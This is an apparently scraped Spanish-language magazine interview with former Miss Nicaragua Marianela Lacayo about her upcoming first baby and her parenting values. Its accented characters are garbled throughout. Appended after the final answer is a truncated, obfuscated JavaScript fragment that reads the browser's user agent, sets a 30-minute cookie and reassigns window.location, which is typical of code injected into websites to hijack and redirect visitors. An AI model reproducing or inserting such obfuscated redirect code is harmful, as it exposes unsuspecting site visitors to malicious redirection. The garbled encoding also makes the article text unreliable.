AtrA?s quedaron las coronas de reinados de belleza para Marianela Lacayo, Miss Nicaragua 2002, quien se prepara para recibir a su primer bebA� en un mes.

Radicada en PanamA? desde hace aA�os, la modelo nicaragA?ense ha hecho de la asesorA�a de imagen su profesiA?n y es columnista de moda. Pero este nuevo rol en su vida es el mA?s importante de todos y estA? marcando todas sus decisiones.

Vestido: Via Vai; aretes: Hombre Jewelry Ricardo Quintero

A?QuA� ha cambiado desde ya?

Lo que ya ha ido cambiando es que desde ahora ya siento que no puedo pensar en mA� de forma egoA�sta. Todo lo que vendrA? serA? en funciA?n de esa persona que depende de mA�, por lo que debo ser mA?s responsable en cualquier decisiA?n que tome.

Vestido: Via Vai; aretes: Hombre Jewelry

El mejor consejo de tu mamA?
Que uno no trae un manual bajo el brazo, pero que la naturaleza es sabia, de manera que debo confiar en mis instintos.

Los tres esenciales
Tiempo de calidad, buena educaciA?n en valores y un entorno familiar sano y estable.

Cargas repartidas
En mi matrimonio, siempre nos hemos manejado de manera excepcional como equipo, tanto en lo referente al hogar como lo profesional. Eso es una gran ventaja para poder lidiar con las responsabilidades, de manera que sA� que no estoy sola.

Nuevos patrones de crianza
Evitaremos todo lo relacionado con la enseA�anza de los estereotipos sobre los roles de la mujer y el hombre. En este caso, enseA�arle a ser un niA�o y luego hombre, que no haga diferencias en los derechos y roles de hombre y mujer para la sociedad.

Un bebA� de muchas culturas
Su fortaleza serA? crecer con una cultura de valor y respeto a sus dos culturas heredadas y la propia, lo que le despertarA? el interA�s de conocer mA?s sobre otros estilos de vida, que le de un criterio mA?s amplio sobre cA?mo funciona el mundo. x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}